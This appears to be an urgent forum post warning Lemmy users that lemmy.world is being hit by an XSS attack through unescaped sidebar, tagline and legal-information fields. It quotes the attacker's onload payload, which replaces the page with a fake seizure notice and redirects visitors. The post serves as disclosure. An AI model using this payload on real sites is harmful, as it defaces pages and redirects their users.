(URGENT) Lemmy has an XSS vulnerability in the tagline, the sidebar and in the legal information field

DO NOT OPEN THE “LEGAL” PAGE


lemmy.world is a victim of an XSS attack right now and the hacker simply injected a JavaScript redirection into the sidebar.

It appears the Lemmy backend does not escape HTML in the main sidebar. Not sure if this is also true for community sidebars.

https://sh.itjust.works/pictrs/image/707c0f16-3d5c-4888-b865-34228d968ee6.png

EDIT:

The exploit is also in the tagline that appears on top of the main feed for status updates, like the following one for SDF Chatter:

https://sh.itjust.works/pictrs/image/2dc8838f-4611-4b62-92d2-ab45d7b1c560.png

https://sh.itjust.works/pictrs/image/9195ec9c-166e-4190-a991-26d218089602.png

EDIT 2:

The legal information field also has that exploit, so that when you go to the “Legal” page it shows the HTML unescaped, but fortunately (for now) he’s using double-quotes.


"legal_information":" ![" onload="if(localStorage.getItem(`h`) != `true`){document.body.innerHTML = `u003Ch1u003ESite has been seized by Reddit for copyright infringmentu003Cu002Fh1u003E`; setTimeout(() =u003E {window.location.href = `https:u002Fu002Flemmy.worldu002Fpictrsu002Fimageu002F7aa772b7-9416-45d1-805b-36ec21be9f66.mp4`}, 10000)}"](https:u002Fu002Flemmy.worldu002Fpictrsu002Fimageu002F66ca36df-4ada-47b3-9169-01870d8fb0ac.png "lw")